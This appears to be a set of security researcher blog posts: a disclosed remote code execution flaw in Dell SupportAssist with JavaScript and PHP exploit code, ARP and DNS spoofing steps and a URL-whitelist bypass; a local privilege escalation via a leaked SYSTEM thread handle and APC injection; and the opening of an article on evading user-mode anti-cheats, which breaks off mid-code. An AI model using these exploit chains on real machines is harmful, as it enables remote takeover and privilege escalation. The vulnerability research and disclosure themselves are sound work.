"Detect PC"? How would it be able to detect my PC? Out of curiosity, I clicked on it to see what happened.

Remote Code Execution on most Dell computers

A program which automatically installs drivers for me. Although it was a convenient feature, it seemed risky. The agent wasn't installed on my computer because it was a fresh Windows installation, but I decided to install it to investigate further. It was very suspicious that Dell claimed to be able to update my drivers through a website.

Installing it was a painless process with just a click-to-install button. In the shadows, the SupportAssist installer created the SupportAssistAgent and Dell Hardware Support services. These services corresponded to .NET binaries, making it easy to reverse engineer what they did. After installing, I went back to the Dell website and decided to check what it could find.

I opened the Chrome Web Inspector, switched to the Network tab, then pressed the "Detect Drivers" button.

The website made requests to port 8884 on my local computer. Checking that port out in Process Hacker showed that the SupportAssistAgent service had a web server on that port. What Dell was doing was exposing a REST API of sorts in their service, which would allow the Dell website to issue various requests. The web server replied with a strict Access-Control-Allow-Origin header of https://www.dell.com to prevent other websites from making requests.

On the web browser side, the client was providing a signature to authenticate various commands. These signatures are generated by making a request to https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken, which also provides the signature's expiration time. After pressing download drivers on the web side, this request was of particular interest:

POST http://127.0.0.1:8884/downloadservice/downloadmanualinstall?expires=expiretime&signature=signature
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
Origin: https://www.dell.com
Referer: https://www.dell.com/support/home/us/en/19/product-support/servicetag/xxxxx/drivers?showresult=true&files=1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

The body:

[
    {
    "title":"Dell G3 3579 and 3779 System BIOS",
    "category":"BIOS",
    "name":"G3_3579_1.9.0.exe",
    "location":"https://downloads.dell.com/FOLDER05519523M/1/G3_3579_1.9.0.exe?uid=29b17007-bead-4ab2-859e-29b6f1327ea1&fn=G3_3579_1.9.0.exe",
    "isSecure":false,
    "fileUniqueId":"acd94f47-7614-44de-baca-9ab6af08cf66",
    "run":false,
    "restricted":false,
    "fileId":"198393521",
    "fileSize":"13 MB",
    "checkedStatus":false,
    "fileStatus":-99,
    "driverId":"4WW45",
    "path":"",
    "dupInstallReturnCode":"",
    "cssClass":"inactive-step",
    "isReboot":true,
    "DiableInstallNow":true,
    "$$hashKey":"object:175"
    }
]

It seemed like the web client could make direct requests to the SupportAssistAgent service to "download and manually install" a program. I decided to find the web server in the SupportAssistAgent service to investigate what commands could be issued.

On start, Dell SupportAssist starts a web server (System.Net.HttpListener) on port 8884, 8883, 8886, or 8885, trying them in that order and using whichever is first available. On a request, the ListenerCallback located in HttpListenerServiceFacade calls ClientServiceHandler.ProcessRequest.
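
To make the port-selection behavior concrete, here is a minimal sketch (my reconstruction for illustration, not Dell's actual code) of how a System.Net.HttpListener-based service can fall back through that port list:

using System;
using System.Net;

class PortFallbackSketch
{
	static readonly int[] CandidatePorts = { 8884, 8883, 8886, 8885 };

	static HttpListener StartListener()
	{
		foreach (int port in CandidatePorts)
		{
			var listener = new HttpListener();
			listener.Prefixes.Add($"http://127.0.0.1:{port}/");
			try
			{
				listener.Start(); // throws if another process already owns the port
				return listener;
			}
			catch (HttpListenerException)
			{
				// Port taken; fall through to the next candidate.
			}
		}
		throw new InvalidOperationException("No candidate port available.");
	}
}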

ClientServiceHandler.ProcessRequest, the base web server function, starts by doing integrity checks, for example making sure the request came from the local machine. Later in this article, we’ll get into some of the issues in the integrity checks, but for now most are not important for achieving RCE.

An important integrity check for us is in ClientServiceHandler.ProcessRequest, specifically the point at which the server checks to make sure my referrer is from Dell. ProcessRequest calls the following function to ensure that I am from Dell:

// Token: 0x060000A8 RID: 168 RVA: 0x00004EA0 File Offset: 0x000030A0
public static bool ValidateDomain(Uri request, Uri urlReferrer)
{
	return SecurityHelper.ValidateDomain(urlReferrer.Host.ToLower()) && (request.Host.ToLower().StartsWith("127.0.0.1") || request.Host.ToLower().StartsWith("localhost")) && request.Scheme.ToLower().StartsWith("http") && urlReferrer.Scheme.ToLower().StartsWith("http");
}

// Token: 0x060000A9 RID: 169 RVA: 0x00004F24 File Offset: 0x00003124
public static bool ValidateDomain(string domain)
{
	return domain.EndsWith(".dell.com") || domain.EndsWith(".dell.ca") || domain.EndsWith(".dell.com.mx") || domain.EndsWith(".dell.com.br") || domain.EndsWith(".dell.com.pr") || domain.EndsWith(".dell.com.ar") || domain.EndsWith(".supportassist.com");
}

The issue with the function above is that it really isn’t a solid check and gives an attacker a lot to work with. To bypass the Referer/Origin check, we have a few options:

  1. Find a Cross Site Scripting vulnerability in any of Dell’s websites (I would only have to find one on the sites designated for SupportAssist)
  2. Find a Subdomain Takeover vulnerability
  3. Make the request from a local program
  4. Generate a random subdomain name and use an external machine to DNS Hijack the victim. Then, when the victim requests [random].dell.com, we respond with our own server.

In the end, I decided to go with option 4, and I’ll explain why a bit later. After verifying the Referer/Origin of the request, ProcessRequest sends the request to the corresponding functions for GET, POST, and OPTIONS.

When I was learning more about how Dell SupportAssist works, I intercepted different types of requests from Dell’s support site. Luckily, my laptop had some pending updates, and I was able to intercept requests through my browser’s console.

At first, the website tries to detect SupportAssist by looping through the aforementioned service ports and connecting to the Service Method “isalive”. What was interesting was that it was passing a “Signature” parameter and an “Expires” parameter. To find out more, I reversed the javascript side of the browser. Here’s what I found out:

  1. First, the browser makes a request to https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken and gets the latest “Token”, or the signatures I was talking about earlier. The endpoint also provides the “Expires token”. This solves the signature problem.
  2. Next, the browser makes a request to each service port with a style like this: http://127.0.0.1:[SERVICEPORT]/clientservice/isalive/?expires=[EXPIRES]&signature=[SIGNATURE].
  3. The SupportAssist client then responds when the right service port is reached, with a style like this:
{
	"isAlive": true,
	"clientVersion": "[CLIENT VERSION]",
	"requiredVersion": null,
	"success": true,
	"data": null,
	"localTime": [EPOCH TIME],
	"Exception": {
		"Code": null,
		"Message": null,
		"Type": null
	}
}
  4. Once the browser sees this, it continues with further requests using the now-determined service port.

One concerning thing I noticed while looking at the different types of requests I could make was that I could get a very detailed description of every piece of hardware connected to my computer using the “getsysteminfo” route. Even through Cross Site Scripting, I was able to access this data, which is an issue because it allows an attacker to seriously fingerprint a system and find sensitive information.

Here are the methods the agent exposes:

clientservice_getdevicedrivers - Grabs available updates.
diagnosticsservice_executetip - Takes a tip guid and provides it to the PC Doctor service (Dell Hardware Support).
downloadservice_downloadfiles - Downloads a JSON array of files.
clientservice_isalive - Used as a heartbeat and returns basic information about the agent.
clientservice_getservicetag - Grabs the service tag.
localclient_img - Connects to SignalR (Dell Hardware Support).
diagnosticsservice_getsysteminfowithappcrashinfo - Grabs system information with crash dump information.
clientservice_getclientsysteminfo - Grabs information about devices on system and system health information optionally.
diagnosticsservice_startdiagnosisflow - Used to diagnose issues on system.
downloadservice_downloadmanualinstall - Downloads a list of files but does not execute them.
diagnosticsservice_getalertsandnotifications - Gets any alerts and notifications that are pending.
diagnosticsservice_launchtool - Launches a diagnostic tool.
diagnosticsservice_executesoftwarefixes - Runs remediation UI and executes a certain action.
downloadservice_createiso - Download an ISO.
clientservice_checkadminrights - Check if the Agent is privileged.
diagnosticsservice_performinstallation - Update SupportAssist.
diagnosticsservice_rebootsystem - Reboot system.
clientservice_getdevices - Grab system devices.
downloadservice_dlmcommand - Check on the status of or cancel an ongoing download.
diagnosticsservice_getsysteminfo - Call GetSystemInfo on PC Doctor (Dell Hardware Support).
downloadservice_installmanual - Install a file previously downloaded using downloadservice_downloadmanualinstall.
downloadservice_createbootableiso - Download bootable iso.
diagnosticsservice_isalive - Heartbeat check.
downloadservice_downloadandautoinstall - Downloads a list of files and executes them.
clientservice_getscanresults - Gets driver scan results.
downloadservice_restartsystem - Restarts the system.

The one that caught my interest was downloadservice_downloadandautoinstall. This method would download a file from a specified URL and then run it. It is run by the browser when certain drivers need to be installed automatically.

  1. After finding which drivers need updating, the browser makes a POST request to “http://127.0.0.1:[SERVICE PORT]/downloadservice/downloadandautoinstall?expires=[EXPIRES]&signature=[SIGNATURE]”.
  2. The browser sends a request with the following JSON structure:
[
	{
	"title":"DOWNLOAD TITLE",
	"category":"CATEGORY",
	"name":"FILENAME",
	"location":"FILE URL",
	"isSecure":false,
	"fileUniqueId":"RANDOMUUID",
	"run":true,
	"installOrder":2,
	"restricted":false,
	"fileStatus":-99,
	"driverId":"DRIVER ID",
	"dupInstallReturnCode":0,
	"cssClass":"inactive-step",
	"isReboot":false,
	"scanPNPId":"PNP ID",
	"$$hashKey":"object:210"
	}
] 
  3. After doing the basic integrity checks we discussed before, ClientServiceHandler.ProcessRequest sends the ServiceMethod and the parameters we passed to ClientServiceHandler.HandlePost.
  4. ClientServiceHandler.HandlePost first puts all parameters into a nice array, then calls ServiceMethodHelper.CallServiceMethod.
  5. ServiceMethodHelper.CallServiceMethod acts as a dispatch function, and calls the function given the ServiceMethod. For us, this is the “downloadandautoinstall” method:
if (service_Method == "downloadservice_downloadandautoinstall")
{
	string files5 = (arguments != null && arguments.Length != 0 && arguments[0] != null) ? arguments[0].ToString() : string.Empty;
	result = DownloadServiceLogic.DownloadAndAutoInstall(files5, false);
} 

Which calls DownloadServiceLogic.DownloadAutoInstall and provides the files we sent in the JSON payload.
6. DownloadServiceLogic.DownloadAutoInstall acts as a wrapper (i.e. handling exceptions) for DownloadServiceLogic._HandleJson.
7. DownloadServiceLogic._HandleJson deserializes the JSON payload containing the list of files to download, and does the following integrity checks:

foreach (File file in list)
{
	bool flag2 = file.Location.ToLower().StartsWith("http://");
	if (flag2)
	{
		file.Location = file.Location.Replace("http://", "https://");
	}
	bool flag3 = file != null && !string.IsNullOrEmpty(file.Location) && !SecurityHelper.CheckDomain(file.Location);
	if (flag3)
	{
		DSDLogger.Instance.Error(DownloadServiceLogic.Logger, "InvalidFileException being thrown in _HandleJson method");
		throw new InvalidFileException();
	}
}
DownloadHandler.Instance.RegisterDownloadRequest(CreateIso, Bootable, Install, ManualInstall, list);

The above code loops through every file and checks that the file URL we provided doesn’t start with http:// (if it does, it replaces it with https://), and that the URL’s host matches a whitelist of Dell’s download servers (not all subdomains):

public static bool CheckDomain(string fileLocation)
{
	List<string> list = new List<string>
	{
		"ftp.dell.com",
		"downloads.dell.com",
		"ausgesd4f1.aus.amer.dell.com"
	};
	
	return list.Contains(new Uri(fileLocation.ToLower()).Host);
} 
  8. Finally, if all these checks pass, the files get sent to DownloadHandler.RegisterDownloadRequest, at which point SupportAssist downloads and runs the files as Administrator.

This is all the information we need to start writing an exploit.

Exploitation

The first issue we face is making requests to the SupportAssist client. Assume we are in the context of a Dell subdomain; we’ll get into exactly how we do this later in this section. I decided to mimic the browser and make requests using javascript.

First things first, we need to find the service port. We can do this by polling through the predefined service ports, and making a request to “/clientservice/isalive”. The issue is that we need to also provide a signature. To get the signature that we pass to isalive, we can make a request to “https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken”.

This isn’t as straightforward as it might seem. The “Access-Control-Allow-Origin” of the signature url is set to “https://www.dell.com”. This is a problem, because we’re in the context of a subdomain, probably not over https. How do we get past this barrier? We make the request from our own servers!

The signatures that are returned from “getdsdtoken” are applicable to all machines, and not unique. I made a small PHP script that will grab the signatures:

<?php
header('Access-Control-Allow-Origin: *');
echo file_get_contents('https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken');
?> 

The header call allows anyone to make a request to this PHP file, and we just echo the signatures, acting as a proxy to the “getdsdtoken” route. The “getdsdtoken” route returns JSON with signatures and an expire time. We can just use JSON.parse on the results to place the signatures into a javascript object.

Now that we have the signature and expire time, we can start making requests. I made a small function that loops through each server port, and if we reach it, we set the server_port variable (global) to the port that responded:

function FindServer() {
	ports.forEach(function(port) {
		var is_alive_url = "http://127.0.0.1:" + port + "/clientservice/isalive/?expires=" + signatures.Expires + "&signature=" + signatures.IsaliveToken;
		var response = SendAsyncRequest(is_alive_url, function(){server_port = port;});
	});
} 

After we have found the server, we can send our payload. This was the hardest part: we have some serious obstacles to clear before “downloadandautoinstall” executes our payload.

Starting with the hardest issue, the SupportAssist client has a hard whitelist on file locations. Specifically, its host must be either "ftp.dell.com", "downloads.dell.com", or "ausgesd4f1.aus.amer.dell.com". I almost gave up at this point, because I couldn’t find an open redirect vulnerability on any of the sites. Then it hit me: we can do a man-in-the-middle attack.

If we could provide the SupportAssist client with a http:// URL, we could easily intercept and change the response! This somewhat solves the hardest challenge.

The second obstacle was designed specifically to counter my solution to the first obstacle. If we look back at the steps I outlined, if the file URL starts with http://, it will be replaced by https://. This is an issue, because we can’t really intercept and change the contents of a proper https connection. The key to bypassing this mitigation was in this sentence: “if the URL starts with http://, it will be replaced by https://”. The thing was, if the URL string did not start with http://, then even if there was http:// somewhere else in the string, nothing would be replaced. Getting a URL to work was tricky, but I eventually came up with “ http://downloads.dell.com/abcdefg” (the space is intentional). When you run that string through the starts-with check, it returns false, because the string starts with “ ”, thus leaving the “http://” alone.
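
Here’s a tiny C# repro of the bypass, assuming the same two checks as the decompiled code above. The reason it works is that System.Uri trims leading whitespace, so the host whitelist still passes:

using System;

class StartsWithBypass
{
	static void Main()
	{
		string location = " http://downloads.dell.com/calc.EXE"; // note the leading space

		// The https:// upgrade never happens, because the string starts with a space.
		Console.WriteLine(location.ToLower().StartsWith("http://")); // False

		// But the whitelist check still passes, because System.Uri trims leading whitespace.
		Console.WriteLine(new Uri(location.ToLower()).Host); // downloads.dell.com
	}
}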

I made a function that automated sending the payload:

function SendRCEPayload() {
	var auto_install_url = "http://127.0.0.1:" + server_port + "/downloadservice/downloadandautoinstall?expires=" + signatures.Expires + "&signature=" + signatures.DownloadAndAutoInstallToken;

	var xmlhttp = new XMLHttpRequest();
	xmlhttp.open("POST", auto_install_url, true);

	var files = [];
	
	files.push({
	"title": "SupportAssist RCE",
	"category": "Serial ATA",
	"name": "calc.EXE",
	"location": " http://downloads.dell.com/calc.EXE", // those spaces are KEY
	"isSecure": false,
	"fileUniqueId": guid(),
	"run": true,
	"installOrder": 2,
	"restricted": false,
	"fileStatus": -99,
	"driverId": "FXGNY",
	"dupInstallReturnCode": 0,
	"cssClass": "inactive-step",
	"isReboot": false,
	"scanPNPId": "PCI\\VEN_8086&DEV_282A&SUBSYS_08851028&REV_10",
	"$$hashKey": "object:210"});
	
	xmlhttp.send(JSON.stringify(files)); 
}

Next up was the attack from the local network. Here are the steps I take in the external portion of my proof of concept (attacker's machine):

  1. Grab the interface IP address for the specified interface.
  2. Start the mock web server and provide it with the filename of the payload we want to send. The web server checks if the Host header is downloads.dell.com and if so sends the binary payload. If the request Host has dell.com in it and is not the downloads domain, it sends the javascript payload which we mentioned earlier.
  3. To ARP Spoof the victim, we first enable IP forwarding, then send an ARP packet to the victim telling it that we're the router and an ARP packet to the router telling it that we're the victim machine. We repeat these packets every few seconds for the duration of our exploit. On exit, we will send the original mac addresses to the victim and router.
  4. Finally, we DNS Spoof by using iptables to redirect DNS packets to a netfilter queue. We listen to this netfilter queue and check if the requested DNS name is our target URL. If so, we send a fake DNS packet back indicating that our machine is the true IP address behind that URL.
  5. When the victim visits our subdomain (either directly via url or indirectly by an iframe), we send it the malicious javascript payload which finds the service port for the agent, grabs the signature from the php file we created earlier, then sends the RCE payload. When the RCE payload is processed by the agent, it will make a request to downloads.dell.com which is when we return the binary payload.

You can read Dell's advisory here.

Demo

Here's a small demo video showcasing the vulnerability. You can download the source code of the proof of concept here.

The source code of the dellrce.html file featured in the video is:

<h1>CVE-2019-3719</h1>
<h1>Nothing suspicious here... move along...</h1>
<iframe src="http://www.dellrce.dell.com" style="width: 0; height: 0; border: 0; border: none; position: absolute;"></iframe>

Timeline

10/26/2018 - Initial write up sent to Dell.

10/29/2018 - Initial response from Dell.

11/22/2018 - Dell has confirmed the vulnerability.

11/29/2018 - Dell scheduled a "tentative" fix to be released in Q1 2019.

01/28/2019 - Disclosure date extended to March.

03/13/2019 - Dell is still fixing the vulnerability and has scheduled disclosure for the end of April.

04/18/2019 - Vulnerability disclosed as an advisory.

Local Privilege Escalation on Dell machines running Windows

19 July 2019 at 14:30

In May, I published a blog post detailing a Remote Code Execution vulnerability in Dell SupportAssist. Since then, my research has continued and I have been finding more and more vulnerabilities. I strongly suggest that you read my previous blog post, not only because it provides a solid conceptual understanding of Dell SupportAssist, but because it's a very interesting bug.

This blog post will cover my research into a Local Privilege Escalation vulnerability in Dell SupportAssist. Dell SupportAssist is advertised to "proactively check the health of your system’s hardware and software". Unfortunately, Dell SupportAssist comes pre-installed on most new Dell machines running Windows. If you're on Windows, never heard of this software, and have a Dell machine - chances are you have it installed.

Discovery

Amusingly enough, this bug was discovered while I was doing my write-up for the previous remote code execution vulnerability. For switching to previous versions of Dell SupportAssist, my method is to stop the service, terminate the process, replace the binary files with an older version, and finally start the service. Typically, I do this through a neat tool called Process Hacker, which is a vamped up version of the built-in Windows Task Manager. When I started the Dell SupportAssist agent, I saw this strange child process.

I had never noticed this process before and instinctively I opened the process to see if I could find more information about it.

We can tell straight away that it's a .NET application, given that the ".NET assemblies" and ".NET performance" tabs are populated. Browsing various sections of the process told us more about it. For example, the "Token" tab showed that this was an unelevated process running as the current user.

While scrolling through the "Handles" tab, something popped out at me.

For those who haven't used Process Hacker in the past, the cyan color indicates that a handle is marked as inheritable. There are plenty of processes that have inheritable handles, but the key part about this handle was the process name it was associated with. This was a THREAD handle to SupportAssistAgent.exe, not SupportAssistAppWire.exe. SupportAssistAgent.exe was the parent SYSTEM process that created SupportAssistAppWire.exe - a process running in an unelevated context. This wasn't that big of a deal either; a SYSTEM process may share a THREAD handle with a child process - even an unelevated one - as long as the handle has restrictive permissions such as THREAD_SYNCHRONIZE. What I saw next is where the problem was evident.

This was no restricted THREAD handle that only allowed for basic operations; this was straight up a FULL CONTROL thread handle to SupportAssistAgent.exe. Let me try to put this in perspective: an unelevated process has a FULL CONTROL handle to a thread in a process running as SYSTEM. See the issue?

Let's see what causes this and how we can exploit it.

Reversing

Every day, Dell SupportAssist runs a "Daily Workflow Task" that performs several routine checks, such as seeing if there is a new notification that needs to be displayed to the user. Specifically, the Daily Workflow Task will:

  • Attempt to query the latest status of any cases you have open
  • Clean up the local database of unneeded entries
  • Clean up log files older than 30 days
  • Clean up reports older than 5 days (primarily logs sent to Dell)
  • Clean up analytic data
  • Register your device with Dell
  • Upload all your log files if it's been 30-45 days
  • Upload any past failed upload attempts
  • If it's been 14 days since the Agent was first started, issue an "Optimize System" notification.

The important thing to remember is that all of these checks are performed on a daily basis. For us, the last check is most relevant, and it's why Dell users receive this "Optimize System" notification constantly.

If you haven't run the PC Doctor optimization scan for over 14 days, you'll see this notification every day. How nice. After determining that a notification should be created, the method OptimizeSystemTakeOverNotification will call the PushNotification method to issue an "Optimize System" notification.

For most versions of Windows 10, PushNotification will call a method called LaunchUwpApp. LaunchUwpApp takes the following steps:

  1. Grab the active console session ID. This value represents the session ID for the user that is currently logged in.
  2. For every process named "explorer", it will check if its session ID matches the active console session ID.
  3. If the explorer process has the same session ID, the agent will duplicate the token of the process.
  4. Finally, if the duplicated token is valid, the Agent will start a child process named SupportAssistAppWire.exe, with InheritHandles set to true.
  5. SupportAssistAppWire.exe will then create the notification.

The flaw in the code can be seen in the call to CreateProcessAsUser.

As we saw in the Discovery section of this post, SupportAssistAgent.exe, an elevated process running as SYSTEM, starts a child process using the unelevated explorer token and sets InheritHandles to true. This means that all inheritable handles that the Agent has will be inherited by the child process. It turns out that the thread handle for the service control handler of the Agent is marked as inheritable.

Exploiting

Now that we have a way of getting a FULL CONTROL thread handle to a SYSTEM process, how do we exploit it? Well, the simplest way I thought of was to call LoadLibrary to load our module. In order to do this, we need to get past a few requirements.

  1. We need to be able to predict the address of a buffer that contains a file path that we can access. For example, if we had a buffer with a predictable address that contained "C:\somepath\etc...", we could write a DLL file to that path and pass LoadLibrary the buffer address.
  2. We need to find a way to use QueueUserApc to call LoadLibrary. This means that we need to have the thread become alertable.

I thought of various ways I could have my string loaded into the memory of the Agent, but the difficult part was finding a way to predict the address of the buffer. Then I had an idea. Does LoadLibrary accept files that don’t have a binary extension?

It appeared so! This meant that the file path in the buffer only needed to point to a file we could access; it did not necessarily need a binary extension such as .exe or .dll. To find a buffer that was already in memory, I opted to use Process Hacker, which includes a Strings utility with built-in filtering. I scanned for strings in an Image that contained C:\. The first hit I got shocked me.

Look at the address of the first string, 0x180163f88... was a module running without ASLR? Checking the modules list for the Agent, I saw something pretty scary.

A module named sqlite3.dll had been loaded with a base address of 0x180000000. Checking the module in CFF Explorer confirmed my findings.

The DLL was built without the IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE characteristic, meaning that ASLR was disabled for it. Somehow this got into the final release build of a piece of software deployed on millions of endpoints. This weakness makes our lives significantly easier because the buffer contained the path c:\dev\sqlite\core\sqlite3.pdb, a file path we could access!

We already determined that the extension makes no difference, meaning that if we write a DLL to c:\dev\sqlite\core\sqlite3.pdb and pass the buffer pointer to LoadLibrary, the module we wrote there should be loaded.

Now that we have the first problem sorted, the next part of our exploitation is to make the thread alertable. What I found in my testing is that this thread was the service control handler for the Agent. This meant that the thread was in a non-alertable Wait state, because it was waiting for a service control signal to come through.

Checking the service permissions for the Agent, I found that the INTERACTIVE group had some permissions. Luckily, INTERACTIVE includes unprivileged users, meaning that the permissions applied directly to us.

Both Interrogate and User-defined control send a service signal to the thread, meaning we can get it out of the Wait state. Since the thread continues execution after receiving a service control signal, we can use SetThreadContext to set the RIP register to a target function. The function NtTestAlert was perfect for this situation because it immediately makes the thread alertable and executes our APCs.

To summarize the exploitation process:

  1. The stager monitors for the child SupportAssistAppWire.exe process.
  2. The stager writes a malicious APC DLL to C:\dev\sqlite\core\sqlite3.pdb.
  3. Once the child process is created, the stager injects our malicious DLL into the process.
  4. The DLL finds the leaked thread handle using a brute-force method (NtQuerySystemInformation works just as well).
  5. The DLL sets the RIP register of the Agent's thread to NtTestAlert.
  6. The DLL queues an APC passing in LoadLibraryA for the user routine and 0x180163f88 (buffer pointer) as the first argument.
  7. The DLL issues an INTERROGATE service control to the service.
  8. The Agent then goes to NtTestAlert triggering the APC which causes the APC DLL to be loaded.
  9. The APC DLL starts our malicious binary (for the PoC it's command prompt) while in the context of a SYSTEM process, causing local privilege escalation.
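
As a rough illustration of step 6 above, here's how queueing that APC might look in C#. This is a sketch under the article's assumptions: leakedThreadHandle stands for the inherited FULL CONTROL handle, and 0x180163f88 is the no-ASLR string address. Since kernel32 is mapped at the same base in every process, the LoadLibraryA address resolved locally is valid inside the Agent too:

using System;
using System.Runtime.InteropServices;

class ApcSketch
{
	[DllImport("kernel32.dll", CharSet = CharSet.Auto)]
	static extern IntPtr GetModuleHandle(string lpModuleName);

	[DllImport("kernel32.dll", CharSet = CharSet.Ansi, ExactSpelling = true)]
	static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);

	[DllImport("kernel32.dll")]
	static extern uint QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, UIntPtr dwData);

	static void QueueLoadLibrary(IntPtr leakedThreadHandle)
	{
		// Resolve LoadLibraryA locally; the address is identical inside the Agent.
		IntPtr loadLibrary = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");

		// 0x180163f88 points at "c:\dev\sqlite\core\sqlite3.pdb" inside sqlite3.dll,
		// predictable only because the module was built without ASLR.
		QueueUserAPC(loadLibrary, leakedThreadHandle, new UIntPtr(0x180163F88UL));
	}
}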

Dell's advisory can be accessed here.

Demo

Privacy concerns

After spending a long time reversing the Dell SupportAssist agent, I've come across a lot of practices that are in my opinion very questionable. I'll leave it up to you, the reader, to decide what you consider acceptable.

  1. On most exceptions, the agent will send the exception detail along with your service tag to Dell's servers.
  2. Whenever a file is executed for Download and Auto install, Dell will send the file name, your service tag, the status of the installer, and the logs for that install to their servers.
  3. Whenever you scan for driver updates, any updates found will be sent to Dell’s servers alongside your service tag.
  4. Whenever Dell retrieves scan results about your BIOS, PnP drivers, installed programs, and operating system information, all of it is uploaded to Dell servers.
  5. Every week your entire log directory is uploaded to Dell servers (yes, Dell logs by default).
  6. Every two weeks, Dell uploads a “heartbeat” including your device details, alerts, software scans, and much more.

You can disable some of this, but it’s enabled by default. Think about the millions of endpoints running Dell SupportAssist…

Timeline

04/25/2019 - Initial write up and proof of concept sent to Dell.

04/26/2019 - Initial response from Dell.

05/08/2019 - Dell has confirmed the vulnerability.

05/27/2019 - Dell has a fix ready to be released within 2 weeks.

06/19/2019 - Vulnerability disclosed by Dell as an advisory.

06/28/2019 - Vulnerability disclosed at RECON Montreal 2019.

Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

2 December 2019 at 15:05

The market for cheating in video games has grown year after year, incentivizing game developers to implement stronger anti-cheat solutions. A significant number of game companies have taken a rather questionable route, implementing more and more invasive anti-cheat solutions in a desperate attempt to combat cheaters, yet still ending up with a game that has a large cheating community. This choice is understandable. A significant number of cheaters have now moved into the kernel realm, challenging anti-cheat developers to design mitigations that combat an attacker who shares the same privilege level. However, not all game companies have followed this invasive path, some opting to use anti-cheats that reside in the user-mode realm.

I've seen a significant number of cheaters approach user-mode anti-cheats the same way they would approach a kernel anti-cheat, often unknowingly assuming that the anti-cheat knows everything, and thus approaching them in an ineffective manner. In this article, we'll look at how to leverage our escalated privileges, as a cheater, to attack the insecure design these unprivileged solutions are built on.

Introduction

When attacking anything technical, one of the first steps I take is to try and put myself in the mind of a defender. For example, when I reverse engineer software for security vulnerabilities, putting myself in the shoes of the developer allows me to better understand the design of the application. Understanding the design behind the logic is critical for vulnerability research, as this often reveals points of weakness that deserve a dedicated look over. When it comes to anti-cheats, the first step I believe any attacker should take is understanding the scope of the application.

What I mean by scope is posing the question: what can the anti-cheat "see" on the machine? This question is incredibly important in researching these anti-cheats, because you may find blind spots on a purely design level. Because user-mode anti-cheats live in an unprivileged context, they're unable to access much and must be creative while developing detection vectors. Let's take a look at what access unprivileged anti-cheats truly have and how we can mitigate against it.

Investigating Detection Vectors

The Filesystem

Most access in Windows is restricted by the use of security descriptors, which dictate who has permissions on an object and how to audit the usage of the object.

For example, if a file or directory has the Users group in its security descriptor, pretty much any user on the machine can access that file or directory. When anti-cheats are in an unprivileged context, they're strictly limited in what they can access on the filesystem, because they're unable to ignore these security descriptors. As a cheater, this provides the unique opportunity to abuse these security descriptors against them to stay under their radar.

Filesystem access is a large part of these anti-cheats because if you run a program with elevated privileges, the unprivileged anti-cheat cannot open a handle to that process. This is due to the difference between their elevation levels, but not being able to open the process is far from being game over. The first method anti-cheats can use to "access" the process is by just opening the process's file. More often than not, the security descriptor for a significant amount of files will be accessible from an unprivileged context.

For example, typically anything in the "Program Files" directory on the C: drive has a security descriptor that permits READ and EXECUTE access to the Users group or allows the Administrators group FULL CONTROL of the directory. Since the Users group is permitted access, unprivileged processes are able to access files in these directories. This is relevant for when you launch a cheating program such as Cheat Engine: one detection vector anti-cheats have is just reading in the file of the process and checking for cheating-related signatures.
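
As a sketch of what that looks like from the anti-cheat's side (the signature bytes here are a made-up placeholder), reading the backing file requires nothing more than the READ access the DACL already grants:

using System;
using System.IO;

class FileScanSketch
{
	// Hypothetical placeholder signature an anti-cheat might look for.
	static readonly byte[] Signature = { 0x43, 0x68, 0x65, 0x61, 0x74 };

	static bool ContainsSignature(string imagePath)
	{
		// Succeeds even against an elevated process, as long as the file's
		// security descriptor grants the Users group READ access.
		byte[] data = File.ReadAllBytes(imagePath);
		for (int i = 0; i <= data.Length - Signature.Length; i++)
		{
			int j = 0;
			while (j < Signature.Length && data[i + j] == Signature[j]) j++;
			if (j == Signature.Length) return true;
		}
		return false;
	}
}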

NT Object Manager Leaks

Filesystem access is not the only trick user-mode anti-cheats have. The next relevant access these anti-cheats have is a significant amount of query access to the current session. In Windows, sessions are what separate active connections to the machine. For example, you being logged into the machine is one session, and someone connected as another user via Remote Desktop will have their own session too. Unprivileged anti-cheats can see almost everything going on in the session that the anti-cheat runs in. This significant access allows anti-cheats to develop strong detection vectors for a lot of different cheats.

Let's see what unprivileged processes can really see. One neat way to view what's going on in your session is by the use of the WinObj Sysinternals utility. WinObj allows you to see a plethora of information about the machine without any special privileges.

WinObj can be run with or without Administrator privileges; however, I suggest using Administrator privileges during investigation, because sometimes you cannot "list" one of the directories above but can still "list" its sub-folders. For example, even for your own session, you cannot "list" the directory containing the BaseNamedObjects, but you can access it directly using the full path \Sessions\[session #]\BaseNamedObjects.

User-mode anti-cheat developers hunt for information leaks in these directories because the information leaks can be significantly subtle. For example, a significant number of kernel tools expose a device for IOCTL communication. Cheat Engine's kernel driver "DBVM" is a more well-known example.

Since by default Everyone can access the Device directory, they can simply check if any devices have a blacklisted name. More subtle leaks happen as well. For example, IDA Pro uses a mutex with a unique name, making it simple to detect when the current session has IDA Pro running.

Window Enumeration

A classic detection vector for all kinds of anti-cheats is the anti-cheat enumerating windows for certain characteristics. Maybe it's a transparent window that's always the top window, or maybe it's a window with a naughty name. Windows provide a unique heuristic detection mechanism, given that cheats often have some sort of GUI component.

To investigate these leaks, I used Process Hacker's "Windows" tab that shows what windows a process has associated with it. For example, coming back to the Cheat Engine example, there are plenty of windows anti-cheats can look for.

User-mode anti-cheats can enumerate windows via the EnumWindows API (or the API that EnumWindows calls), which allows them to enumerate every window in the current session. There are many things anti-cheats can look for in windows, whether that be the class, the text, the process associated with the window, etc.
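
A minimal sketch of that sweep (the window-title blacklist match is of course a naive placeholder):

using System;
using System.Runtime.InteropServices;
using System.Text;

class WindowEnumSketch
{
	delegate bool EnumWindowsProc(IntPtr hWnd, IntPtr lParam);

	[DllImport("user32.dll")]
	static extern bool EnumWindows(EnumWindowsProc lpEnumFunc, IntPtr lParam);

	[DllImport("user32.dll", CharSet = CharSet.Unicode)]
	static extern int GetWindowText(IntPtr hWnd, StringBuilder lpString, int nMaxCount);

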